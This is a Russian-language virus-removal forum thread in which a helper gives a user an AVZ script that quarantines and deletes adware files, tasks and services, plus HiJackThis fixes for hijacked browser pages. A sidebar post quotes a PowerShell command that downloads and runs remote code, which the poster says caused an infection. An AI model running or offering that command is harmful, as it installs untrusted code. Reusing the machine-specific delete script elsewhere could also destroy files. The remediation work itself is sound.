Перейти к содержанию
Правила раздела

Вирусы

саша98

От саша98
в Помощь в удалении вирусов

 Share

Рекомендуемые сообщения

thyrex Мудрец

thyrex

Опубликовано
Опубликовано
Ge-Force-->C:\Program Files\Ge-Force\Uninstall.exe /fcp=1 
HQCinema Pro 2.1V15.01-->C:\Program Files\HQCinema Pro 2.1V15.01\Uninstall.exe /fcp=1 
SavePass 1.1-->C:\Program Files\SavePass 1.1\Uninstall.exe /fcp=1 
Sense-->C:\Program Files\Sense\Uninstall.exe /fcp=1 
Shopper-Pro-->C:\Program Files\ShopperPro\SPremove.exe
webssearches uninstall-->C:\Users\Lenovo\AppData\Roaming\webssearches\UninstallManager.exe  -ptid=obw
YTDownloader-->C:\Program Files\YTDownloader\YTDUninstall.exe

 

 
удалите через Установку программ
 
Выполните скрипт в AVZ
begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.' + #13#10 + 'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
 then
  begin
   SearchRootkit(true, true);
   SetAVZGuardStatus(True);
  end;

QuarantineFile('C:\Windows\system32\setup\svchost.exe','');
 QuarantineFile('C:\Users\Lenovo\AppData\Roaming\RPHRXMM.exe','');
 QuarantineFile('C:\Users\Lenovo\AppData\Roaming\PEGBTQV.exe','');
 QuarantineFile('C:\Users\Lenovo\AppData\Roaming\DSite\UPDATE~1\UPDATE~1.EXE','');
 QuarantineFile('C:\Users\Lenovo\AppData\Roaming\Dealply\UPDATE~1\UPDATE~1.EXE','');
 QuarantineFile('C:\Program Files\Ge-Force\d325740d-600e-4187-b686-a8a13135d35c-7.exe','');
 QuarantineFile('C:\Program Files\Ge-Force\d325740d-600e-4187-b686-a8a13135d35c-6.exe','');
 QuarantineFile('C:\Program Files\Ge-Force\d325740d-600e-4187-b686-a8a13135d35c-5.exe','');
 QuarantineFile('C:\Program Files\Ge-Force\d325740d-600e-4187-b686-a8a13135d35c-2.exe','');
 QuarantineFile('C:\Program Files\Ge-Force\d325740d-600e-4187-b686-a8a13135d35c-11.exe','');
 QuarantineFile('C:\Program Files\Ge-Force\Ge-Force-codedownloader.exe','');
 QuarantineFile('C:\Program Files\HQCinema Pro 2.1V15.01\84fdcfd9-f2eb-48d8-87e8-26901f6f9fd1-7.exe','');
 QuarantineFile('C:\Program Files\HQCinema Pro 2.1V15.01\84fdcfd9-f2eb-48d8-87e8-26901f6f9fd1-6.exe','');
 QuarantineFile('C:\Program Files\HQCinema Pro 2.1V15.01\84fdcfd9-f2eb-48d8-87e8-26901f6f9fd1-5.exe','');
 QuarantineFile('C:\Program Files\HQCinema Pro 2.1V15.01\84fdcfd9-f2eb-48d8-87e8-26901f6f9fd1-3.exe','');
 QuarantineFile('C:\Program Files\HQCinema Pro 2.1V15.01\84fdcfd9-f2eb-48d8-87e8-26901f6f9fd1-2.exe','');
 QuarantineFile('C:\Program Files\HQCinema Pro 2.1V15.01\84fdcfd9-f2eb-48d8-87e8-26901f6f9fd1-11.exe','');
 QuarantineFile('C:\Program Files\Sense\7b5afe20-a664-4334-8e61-8dadf7a1b3e9-7.exe','');
 QuarantineFile('C:\Program Files\Sense\7b5afe20-a664-4334-8e61-8dadf7a1b3e9-6.exe','');
 QuarantineFile('C:\Program Files\Sense\7b5afe20-a664-4334-8e61-8dadf7a1b3e9-5.exe','');
 QuarantineFile('C:\Program Files\Sense\7b5afe20-a664-4334-8e61-8dadf7a1b3e9-2.exe','');
 QuarantineFile('C:\Program Files\Sense\7b5afe20-a664-4334-8e61-8dadf7a1b3e9-11.exe','');
 QuarantineFile('C:\Program Files\Sense\Sense-codedownloader.exe','');
 QuarantineFile('C:\Program Files\SavePass 1.1\07c628d5-e888-4943-b117-54be5afbe383-7.exe','');
 QuarantineFile('C:\Program Files\SavePass 1.1\07c628d5-e888-4943-b117-54be5afbe383-6.exe','');
 QuarantineFile('C:\Program Files\SavePass 1.1\07c628d5-e888-4943-b117-54be5afbe383-5.exe','');
 QuarantineFile('C:\Program Files\SavePass 1.1\07c628d5-e888-4943-b117-54be5afbe383-2.exe','');
 QuarantineFile('C:\Program Files\SavePass 1.1\07c628d5-e888-4943-b117-54be5afbe383-11.exe','');
 QuarantineFile('C:\Program Files\SavePass 1.1\07c628d5-e888-4943-b117-54be5afbe383-10.exe','');
 DelBHO('{99079a25-328f-4bd4-be04-00955acaa0a7}');
 QuarantineFile('C:\PROGRA~1\SEARCH~1\Datamngr\ToolBar\searchqudtx.dll','');
 DelBHO('{11111111-1111-1111-1111-110611981129}');
 DelBHO('{11111111-1111-1111-1111-110611971195}');
 DelBHO('{11111111-1111-1111-1111-110611901165}');
 DelBHO('{11111111-1111-1111-1111-110611901159}');
 QuarantineFile('C:\iexplore.bat','');
 QuarantineFile('C:\Program Files\ShopperPro\JSDriver\1472.0.0.0\jsdrv.exe','');
 QuarantineFile('C:\Program Files\Google\chrome.bat','');
 SetServiceStart('WindowsMangerProtect', 4);
 DeleteService('WindowsMangerProtect');
 QuarantineFile('C:\Windows\system32\drivers\{689b5bed-4e9b-4b8b-a673-3c39fb4d2820}Gw.sys','');
 QuarantineFile('C:\program files\sense\Sense-buttonutil.dll','');
 QuarantineFile('C:\Program Files\Sense\Sense-bho.dll','');
 QuarantineFile('C:\Program Files\SavePass 1.1\SavePass 1.1-bho.dll','');
 QuarantineFile('C:\Program Files\HQCinema Pro 2.1V15.01\HQCinema Pro 2.1V15.01-bho.dll','');
 QuarantineFile('C:\program files\ge-force\Ge-Force-buttonutil.dll','');
 QuarantineFile('C:\Program Files\Ge-Force\Ge-Force-bho.dll','');
 TerminateProcessByName('c:\program files\sense\sense-bg.exe');
 QuarantineFile('c:\program files\sense\sense-bg.exe','');
 TerminateProcessByName('c:\program files\savepass 1.1\savepass 1.1-bg.exe');
 QuarantineFile('c:\program files\savepass 1.1\savepass 1.1-bg.exe','');
 TerminateProcessByName('c:\programdata\windowsmangerprotect\protectwindowsmanager.exe');
 QuarantineFile('c:\programdata\windowsmangerprotect\protectwindowsmanager.exe','');
 TerminateProcessByName('c:\program files\hqcinema pro 2.1v15.01\hqcinema pro 2.1v15.01-bg.exe');
 QuarantineFile('c:\program files\hqcinema pro 2.1v15.01\hqcinema pro 2.1v15.01-bg.exe','');
 TerminateProcessByName('c:\program files\ge-force\ge-force-bg.exe');
 QuarantineFile('c:\program files\ge-force\ge-force-bg.exe','');
 TerminateProcessByName('c:\program files\ge-force\d325740d-600e-4187-b686-a8a13135d35c-6.exe');
 QuarantineFile('c:\program files\ge-force\d325740d-600e-4187-b686-a8a13135d35c-6.exe','');
 TerminateProcessByName('c:\program files\hqcinema pro 2.1v15.01\84fdcfd9-f2eb-48d8-87e8-26901f6f9fd1-6.exe');
 QuarantineFile('c:\program files\hqcinema pro 2.1v15.01\84fdcfd9-f2eb-48d8-87e8-26901f6f9fd1-6.exe','');
 TerminateProcessByName('c:\program files\sense\7b5afe20-a664-4334-8e61-8dadf7a1b3e9-6.exe');
 QuarantineFile('c:\program files\sense\7b5afe20-a664-4334-8e61-8dadf7a1b3e9-6.exe','');
 TerminateProcessByName('c:\program files\savepass 1.1\07c628d5-e888-4943-b117-54be5afbe383-6.exe');
 QuarantineFile('c:\program files\savepass 1.1\07c628d5-e888-4943-b117-54be5afbe383-6.exe','');
 DeleteFile('c:\program files\savepass 1.1\07c628d5-e888-4943-b117-54be5afbe383-6.exe','32');
 DeleteFile('c:\program files\sense\7b5afe20-a664-4334-8e61-8dadf7a1b3e9-6.exe','32');
 DeleteFile('c:\program files\hqcinema pro 2.1v15.01\84fdcfd9-f2eb-48d8-87e8-26901f6f9fd1-6.exe','32');
 DeleteFile('c:\program files\ge-force\d325740d-600e-4187-b686-a8a13135d35c-6.exe','32');
 DeleteFile('c:\program files\ge-force\ge-force-bg.exe','32');
 DeleteFile('c:\program files\hqcinema pro 2.1v15.01\hqcinema pro 2.1v15.01-bg.exe','32');
 DeleteFile('c:\programdata\windowsmangerprotect\protectwindowsmanager.exe','32');
 DeleteFile('c:\program files\savepass 1.1\savepass 1.1-bg.exe','32');
 DeleteFile('c:\program files\sense\sense-bg.exe','32');
 DeleteFile('C:\Program Files\Ge-Force\Ge-Force-bho.dll','32');
 DeleteFile('C:\program files\ge-force\Ge-Force-buttonutil.dll','32');
 DeleteFile('C:\Program Files\HQCinema Pro 2.1V15.01\HQCinema Pro 2.1V15.01-bho.dll','32');
 DeleteFile('C:\Program Files\SavePass 1.1\SavePass 1.1-bho.dll','32');
 DeleteFile('C:\Program Files\Sense\Sense-bho.dll','32');
 DeleteFile('C:\program files\sense\Sense-buttonutil.dll','32');
 DeleteFile('C:\Windows\system32\drivers\{689b5bed-4e9b-4b8b-a673-3c39fb4d2820}Gw.sys','32');
 DeleteFile('C:\Program Files\Google\chrome.bat','32');
 DeleteFile('C:\Program Files\ShopperPro\JSDriver\1472.0.0.0\jsdrv.exe','32');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','SPDriver');
 RegKeyParamDel('HKEY_CURRENT_USER','Software\Microsoft\Windows\CurrentVersion\Run','SPDriver');
 DeleteFile('C:\iexplore.bat','32');
 DeleteFile('C:\PROGRA~1\SEARCH~1\Datamngr\ToolBar\searchqudtx.dll','32');
 DeleteFile('C:\Windows\Tasks\07c628d5-e888-4943-b117-54be5afbe383-1.job','32');
 DeleteFile('C:\Program Files\SavePass 1.1\07c628d5-e888-4943-b117-54be5afbe383-10.exe','32');
 DeleteFile('C:\Windows\Tasks\07c628d5-e888-4943-b117-54be5afbe383-10_user.job','32');
 DeleteFile('C:\Windows\Tasks\07c628d5-e888-4943-b117-54be5afbe383-11.job','32');
 DeleteFile('C:\Program Files\SavePass 1.1\07c628d5-e888-4943-b117-54be5afbe383-11.exe','32');
 DeleteFile('C:\Program Files\SavePass 1.1\07c628d5-e888-4943-b117-54be5afbe383-2.exe','32');
 DeleteFile('C:\Windows\Tasks\07c628d5-e888-4943-b117-54be5afbe383-2.job','32');
 DeleteFile('C:\Windows\Tasks\07c628d5-e888-4943-b117-54be5afbe383-5.job','32');
 DeleteFile('C:\Program Files\SavePass 1.1\07c628d5-e888-4943-b117-54be5afbe383-5.exe','32');
 DeleteFile('C:\Windows\Tasks\07c628d5-e888-4943-b117-54be5afbe383-5_user.job','32');
 DeleteFile('C:\Program Files\SavePass 1.1\07c628d5-e888-4943-b117-54be5afbe383-6.exe','32');
 DeleteFile('C:\Windows\Tasks\07c628d5-e888-4943-b117-54be5afbe383-6.job','32');
 DeleteFile('C:\Windows\Tasks\07c628d5-e888-4943-b117-54be5afbe383-7.job','32');
 DeleteFile('C:\Program Files\SavePass 1.1\07c628d5-e888-4943-b117-54be5afbe383-7.exe','32');
 DeleteFile('C:\Program Files\Sense\Sense-codedownloader.exe','32');
 DeleteFile('C:\Windows\Tasks\7b5afe20-a664-4334-8e61-8dadf7a1b3e9-1.job','32');
 DeleteFile('C:\Windows\Tasks\7b5afe20-a664-4334-8e61-8dadf7a1b3e9-11.job','32');
 DeleteFile('C:\Program Files\Sense\7b5afe20-a664-4334-8e61-8dadf7a1b3e9-11.exe','32');
 DeleteFile('C:\Program Files\Sense\7b5afe20-a664-4334-8e61-8dadf7a1b3e9-2.exe','32');
 DeleteFile('C:\Windows\Tasks\7b5afe20-a664-4334-8e61-8dadf7a1b3e9-2.job','32');
 DeleteFile('C:\Windows\Tasks\7b5afe20-a664-4334-8e61-8dadf7a1b3e9-5.job','32');
 DeleteFile('C:\Windows\Tasks\7b5afe20-a664-4334-8e61-8dadf7a1b3e9-5_user.job','32');
 DeleteFile('C:\Program Files\Sense\7b5afe20-a664-4334-8e61-8dadf7a1b3e9-5.exe','32');
 DeleteFile('C:\Program Files\Sense\7b5afe20-a664-4334-8e61-8dadf7a1b3e9-6.exe','32');
 DeleteFile('C:\Program Files\Sense\7b5afe20-a664-4334-8e61-8dadf7a1b3e9-7.exe','32');
 DeleteFile('C:\Windows\Tasks\7b5afe20-a664-4334-8e61-8dadf7a1b3e9-7.job','32');
 DeleteFile('C:\Windows\Tasks\7b5afe20-a664-4334-8e61-8dadf7a1b3e9-6.job','32');
 DeleteFile('C:\Windows\Tasks\84fdcfd9-f2eb-48d8-87e8-26901f6f9fd1-1.job','32');
 DeleteFile('C:\Program Files\HQCinema Pro 2.1V15.01\84fdcfd9-f2eb-48d8-87e8-26901f6f9fd1-11.exe','32');
 DeleteFile('C:\Windows\Tasks\84fdcfd9-f2eb-48d8-87e8-26901f6f9fd1-11.job','32');
 DeleteFile('C:\Windows\Tasks\84fdcfd9-f2eb-48d8-87e8-26901f6f9fd1-2.job','32');
 DeleteFile('C:\Program Files\HQCinema Pro 2.1V15.01\84fdcfd9-f2eb-48d8-87e8-26901f6f9fd1-2.exe','32');
 DeleteFile('C:\Program Files\HQCinema Pro 2.1V15.01\84fdcfd9-f2eb-48d8-87e8-26901f6f9fd1-3.exe','32');
 DeleteFile('C:\Windows\Tasks\84fdcfd9-f2eb-48d8-87e8-26901f6f9fd1-3.job','32');
 DeleteFile('C:\Windows\Tasks\84fdcfd9-f2eb-48d8-87e8-26901f6f9fd1-5.job','32');
 DeleteFile('C:\Program Files\HQCinema Pro 2.1V15.01\84fdcfd9-f2eb-48d8-87e8-26901f6f9fd1-5.exe','32');
 DeleteFile('C:\Windows\Tasks\84fdcfd9-f2eb-48d8-87e8-26901f6f9fd1-5_user.job','32');
 DeleteFile('C:\Windows\Tasks\84fdcfd9-f2eb-48d8-87e8-26901f6f9fd1-6.job','32');
 DeleteFile('C:\Program Files\HQCinema Pro 2.1V15.01\84fdcfd9-f2eb-48d8-87e8-26901f6f9fd1-6.exe','32');
 DeleteFile('C:\Program Files\HQCinema Pro 2.1V15.01\84fdcfd9-f2eb-48d8-87e8-26901f6f9fd1-7.exe','32');
 DeleteFile('C:\Windows\Tasks\84fdcfd9-f2eb-48d8-87e8-26901f6f9fd1-7.job','32');
 DeleteFile('C:\Program Files\Ge-Force\Ge-Force-codedownloader.exe','32');
 DeleteFile('C:\Windows\Tasks\d325740d-600e-4187-b686-a8a13135d35c-1.job','32');
 DeleteFile('C:\Windows\Tasks\d325740d-600e-4187-b686-a8a13135d35c-11.job','32');
 DeleteFile('C:\Program Files\Ge-Force\d325740d-600e-4187-b686-a8a13135d35c-11.exe','32');
 DeleteFile('C:\Program Files\Ge-Force\d325740d-600e-4187-b686-a8a13135d35c-2.exe','32');
 DeleteFile('C:\Windows\Tasks\d325740d-600e-4187-b686-a8a13135d35c-2.job','32');
 DeleteFile('C:\Windows\Tasks\d325740d-600e-4187-b686-a8a13135d35c-5.job','32');
 DeleteFile('C:\Windows\Tasks\d325740d-600e-4187-b686-a8a13135d35c-5_user.job','32');
 DeleteFile('C:\Program Files\Ge-Force\d325740d-600e-4187-b686-a8a13135d35c-5.exe','32');
 DeleteFile('C:\Program Files\Ge-Force\d325740d-600e-4187-b686-a8a13135d35c-6.exe','32');
 DeleteFile('C:\Windows\Tasks\d325740d-600e-4187-b686-a8a13135d35c-6.job','32');
 DeleteFile('C:\Windows\Tasks\d325740d-600e-4187-b686-a8a13135d35c-7.job','32');
 DeleteFile('C:\Program Files\Ge-Force\d325740d-600e-4187-b686-a8a13135d35c-7.exe','32');
 DeleteFile('C:\Users\Lenovo\AppData\Roaming\Dealply\UPDATE~1\UPDATE~1.EXE','32');
 DeleteFile('C:\Windows\Tasks\Dealply.job','32');
 DeleteFile('C:\Windows\Tasks\DSite.job','32');
 DeleteFile('C:\Users\Lenovo\AppData\Roaming\DSite\UPDATE~1\UPDATE~1.EXE','32');
 DeleteFile('C:\Users\Lenovo\AppData\Roaming\PEGBTQV.exe','32');
 DeleteFile('C:\Users\Lenovo\AppData\Roaming\RPHRXMM.exe','32');
 DeleteFile('C:\Windows\Tasks\RPHRXMM.job','32');
 DeleteFile('C:\Windows\Tasks\PEGBTQV.job','32');
 DeleteFile('C:\Windows\system32\Tasks\07c628d5-e888-4943-b117-54be5afbe383-1','32');
 DeleteFile('C:\Windows\system32\Tasks\07c628d5-e888-4943-b117-54be5afbe383-11','32');
 DeleteFile('C:\Windows\system32\Tasks\07c628d5-e888-4943-b117-54be5afbe383-2','32');
 DeleteFile('C:\Windows\system32\Tasks\07c628d5-e888-4943-b117-54be5afbe383-5','32');
 DeleteFile('C:\Windows\system32\Tasks\07c628d5-e888-4943-b117-54be5afbe383-6','32');
 DeleteFile('C:\Windows\system32\Tasks\07c628d5-e888-4943-b117-54be5afbe383-7','32');
 DeleteFile('C:\Windows\system32\Tasks\7b5afe20-a664-4334-8e61-8dadf7a1b3e9-1','32');
 DeleteFile('C:\Windows\system32\Tasks\7b5afe20-a664-4334-8e61-8dadf7a1b3e9-11','32');
 DeleteFile('C:\Windows\system32\Tasks\7b5afe20-a664-4334-8e61-8dadf7a1b3e9-2','32');
 DeleteFile('C:\Windows\system32\Tasks\7b5afe20-a664-4334-8e61-8dadf7a1b3e9-5','32');
 DeleteFile('C:\Windows\system32\Tasks\7b5afe20-a664-4334-8e61-8dadf7a1b3e9-6','32');
 DeleteFile('C:\Windows\system32\Tasks\7b5afe20-a664-4334-8e61-8dadf7a1b3e9-7','32');
 DeleteFile('C:\Windows\system32\Tasks\84fdcfd9-f2eb-48d8-87e8-26901f6f9fd1-1','32');
 DeleteFile('C:\Windows\system32\Tasks\84fdcfd9-f2eb-48d8-87e8-26901f6f9fd1-11','32');
 DeleteFile('C:\Windows\system32\Tasks\84fdcfd9-f2eb-48d8-87e8-26901f6f9fd1-2','32');
 DeleteFile('C:\Windows\system32\Tasks\84fdcfd9-f2eb-48d8-87e8-26901f6f9fd1-3','32');
 DeleteFile('C:\Windows\system32\Tasks\84fdcfd9-f2eb-48d8-87e8-26901f6f9fd1-5','32');
 DeleteFile('C:\Windows\system32\Tasks\84fdcfd9-f2eb-48d8-87e8-26901f6f9fd1-6','32');
 DeleteFile('C:\Windows\system32\Tasks\84fdcfd9-f2eb-48d8-87e8-26901f6f9fd1-7','32');
 DeleteFile('C:\Windows\system32\Tasks\d325740d-600e-4187-b686-a8a13135d35c-1','32');
 DeleteFile('C:\Windows\system32\Tasks\d325740d-600e-4187-b686-a8a13135d35c-11','32');
 DeleteFile('C:\Windows\system32\Tasks\d325740d-600e-4187-b686-a8a13135d35c-2','32');
 DeleteFile('C:\Windows\system32\Tasks\d325740d-600e-4187-b686-a8a13135d35c-5','32');
 DeleteFile('C:\Windows\system32\Tasks\d325740d-600e-4187-b686-a8a13135d35c-6','32');
 DeleteFile('C:\Windows\system32\Tasks\d325740d-600e-4187-b686-a8a13135d35c-7','32');
 DeleteFile('C:\Windows\system32\Tasks\Dealply','32');
 DeleteFile('C:\Windows\system32\Tasks\DSite','32');
 DeleteFile('C:\Windows\system32\Tasks\SPDriver','32');
 DeleteFile('C:\Windows\system32\setup\svchost.exe','32');

 BC_ImportAll;
ExecuteSysClean;
BC_Activate;
RebootWindows(false);
end.
Компьютер перезагрузится.
 
Выполните скрипт в AVZ
begin
CreateQurantineArchive('c:\quarantine.zip');
end.
c:\quarantine.zip отправьте через данную форму.
1. Выберите тип запроса "Запрос на исследование вредоносного файла".
2. В окне "Подробное описание возникшей ситуации" наберите "Выполняется запрос хэлпера".
3. Прикрепите файл карантина
4. Введите изображенное на картинке число и нажмите "Далее".
5. Если размер карантина превышает 15 Мб, то карантин отправьте по адресу newvirus@kaspersky.com
 Полученный ответ сообщите здесь (с указанием номера KLAN)
 
Пофиксите в HiJack
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://istart.webssearches.com/?type=hp&ts=1421319772&from=obw&uid=HITACHIXHTS543232A7A384_E2434243E2KNUKE2KNUKX
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://yamdex.net/?searchid=1&l10n=ru&fromsearch=1&imsid=81f09f5e600322a247e56250456919bb&text={searchTerms}
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://yamdex.net/?searchid=1&l10n=ru&fromsearch=1&imsid=81f09f5e600322a247e56250456919bb&text={searchTerms}
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.rambler.ru/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://istart.webssearches.com/?type=hp&ts=1421319772&from=obw&uid=HITACHIXHTS543232A7A384_E2434243E2KNUKE2KNUKX
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://istart.webssearches.com/web/?type=ds&ts=1421319772&from=obw&uid=HITACHIXHTS543232A7A384_E2434243E2KNUKE2KNUKX&q={searchTerms}
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://istart.webssearches.com/web/?type=ds&ts=1421319772&from=obw&uid=HITACHIXHTS543232A7A384_E2434243E2KNUKE2KNUKX&q={searchTerms}
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://istart.webssearches.com/?type=hp&ts=1421319772&from=obw&uid=HITACHIXHTS543232A7A384_E2434243E2KNUKE2KNUKX
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://istart.webssearches.com/web/?type=ds&ts=1421319772&from=obw&uid=HITACHIXHTS543232A7A384_E2434243E2KNUKE2KNUKX&q={searchTerms}
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = http://istart.webssearches.com/web/?type=ds&ts=1421319772&from=obw&uid=HITACHIXHTS543232A7A384_E2434243E2KNUKE2KNUKX&q={searchTerms}
O2 - BHO: Спутник@Mail.Ru - {8984B388-A5BB-4DF7-B274-77B879E179DB} - (no file)
O2 - BHO: (no name) - {D5FEC983-01DB-414a-9456-AF95AC9ED7B5} - (no file)
Сделайте новые логи
 
Скачайте ClearLNK и сохраните архив с утилитой на Рабочем столе.
Распакуйте архив с утилитой в отдельную папку.
Перенесите Check_Browsers_LNK.log на ClearLNK как показано на рисунке
 
move.gif
 
Отчет о работе ClearLNK-<Дата>.log будет сохранен в папке LOG.
Прикрепите этот отчет к своему следующему сообщению.

 
Ссылка на комментарий
Поделиться на другие сайты
саша98 Постоялец

саша98

Опубликовано
  • Автор
Опубликовано

@thyrex

1)Все программы удалил

 

2)[VirLabSRF][Malicious file analysis][M:1][LN:RU][L:1] [KLAN-2430855734]

oRQU4q4Gvdo.jpg

2) Во время пофиксовки "выскочило" такое окноlRE3C-t09nY.jpg

 

3)новые логи

4)лог ClearLNK

CollectionLog-2015.01.16-22.03.zip

ClearLNK-16.01.2015_22-06.log

Ссылка на комментарий
Поделиться на другие сайты
thyrex Мудрец

thyrex

Опубликовано
Опубликовано

 

 


Во время пофиксовки "выскочило" такое окно
Ну так в нем ясно написано, что надо было перед фиксом закрыть все окна Проводника и Internet Explorer

 

Удалите вручную

C:\ProgramData\WindowsMangerProtect
C:\Program Files\globalUpdate
C:\iехplоrе.bаt.exe
C:\lаunсhеr.bаt.exe
C:\launcher.bat
C:\ProgramData\ShopperPro
C:\Program Files\ShopperPro
C:\Program Files\Common Files\Baidu
C:\Users\Lenovo\AppData\Roaming\Baidu
C:\ProgramData\Baidu
C:\Users\Lenovo\AppData\Roaming\eTranslator

 

Что с проблемой?

Ссылка на комментарий
Поделиться на другие сайты
саша98 Постоялец

саша98

Опубликовано
  • Автор
Опубликовано

 

Во время пофиксовки "выскочило" такое окно

Ну так в нем ясно написано, что надо было перед фиксом закрыть все окна Проводника и Internet Explorer

 

 

 

Я английский знаю, но все окна Проводника и Internet Explorer были закрыты. 

Возникла такая проблема при удалении одной из папок 

3yylgBf2ZO4.jpg

Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
 Share
Перейти к списку тем

  • Похожий контент

    • San4s2034
      Вирус-майнер
      От San4s2034
      Недавно скачал Game of Thrones Genesis с torrent-game.net. Касперски указал, что сайту можно доверять и он проверен. По итогу через время заметил, что в valorant фпс стал заблоченным на 75 и поднимается вверх только если я двигаю мышкой или нажимаю что-то на клавиатуре. Очевидно, что словил майнер. Запустил быструю и полную проверку, результата не дало. Попробовал через защитник windows 11. Заметил, что прогресс доходит до ~70% и потом просто зависает. Запустился через безопасный режим, зашёл в защитник и вылезла ошибка(скриншот). Проверил реестр и групповые политики, ничего нет, все чисто. 

    • San4s2034
      Вирус-майнер
      От San4s2034
      Недавно скачал Game of Thrones Genesis с torrent-game.net. Касперски указал, что сайту можно доверять и он проверен. По итогу через время заметил, что в valorant фпс стал заблоченным на 75 и поднимается вверх только если я двигаю мышкой или нажимаю что-то на клавиатуре. Очевидно, что словил майнер. Запустил быструю и полную проверку, результата не дало. Попробовал через защитник windows 11. Заметил, что прогресс доходит до ~70% и потом просто зависает. Запустился через безопасный режим, зашёл в защитник и вылезла ошибка(скриншот). Проверил реестр и групповые политики, ничего нет, все чисто. 

    • fertune
      Вирус dialer.exe
      От fertune
      Когда открываешь диспетчер задач то сначала ЦП грузит на 100% а потом на 10% я посмотрел через dr.web cureit и увидел то что это майнер dialer.exe, смотрел в интернете как пофиксить но никакие способы не помогли(может быть я что то делал неправильно)
      можете помочь с проблемой? Еще я пробовал его фиксить удаляя его но он опять появлялся и грузил ЦП на все 100%.
       
    • Temikst
      Поймал какой-то вирус
      От Temikst
      Приветствую. Сын скачивал какую-то программу для игры, как итог словили какой-то вирус. Dr.web ничего не нашел. но обратил внимание что комп стал тупить, до этого не было так
      CollectionLog-2025.02.09-23.46.zip

       
      Даже браузер сильно тормозит. после открывание диспетчер задач сразу же лучше работает\
    • VanyeJ
      Вирус в PowerShell
      От VanyeJ
      Здравствуйте, при включении компьютера и окончательном входе в систему PowerShell пытается перекинуть на вредоносную ссылку. Касперский сразу же блокирует.

      Событие: Остановлен переход на сайт
      Пользователь: WIN-O4R3Q0UCBR5\User
      Тип пользователя: Инициатор
      Имя приложения: powershell.exe
      Путь к приложению: C:\Windows\System32\WindowsPowerShell\v1.0
      Компонент: Интернет-защита
      Описание результата: Запрещено
      Тип: Вредоносная ссылка
      Название: 
      Точность: Точно
      Степень угрозы: Высокая
      Тип объекта: Веб-страница
      Имя объекта: 1731762779-9803.jpeg
      Путь к объекту: 
      Причина: Облачная защита

      Активировал Windows через cmd после этого появилось (powershell iex (irm 'activated.run/key')) команда после которой вирус появился.
      CollectionLog-2025.02.08-15.48.zip
×
×
  • Создать...